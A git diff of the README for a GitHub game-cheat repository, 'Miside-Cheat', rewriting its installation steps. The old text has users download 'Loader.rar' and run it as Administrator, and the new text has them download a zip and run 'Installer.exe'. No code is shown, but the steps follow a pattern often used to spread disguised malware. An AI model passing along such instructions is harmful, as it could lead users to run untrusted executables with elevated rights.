Kganesh007/Miside-Cheat/README.md

 ## 🚀 Installation

-1. Download the latest version of **Loader.rar**
+1. Go to the [Releases](https://github.com/Kganesh007/Miside-Cheat/releases/tag/Miside-Cheat) section of this repository.
-2. Extract the files to a folder of your choice.
+2. Download the latest `Miside-Cheat.zip` archive.
-3. Run file as Administrator.
+3. Extract the contents of the archive to a convenient location.
-4. Launch **Miside** and enable the features you want!
+4. Run the `Installer.exe` file to start the application.

 ---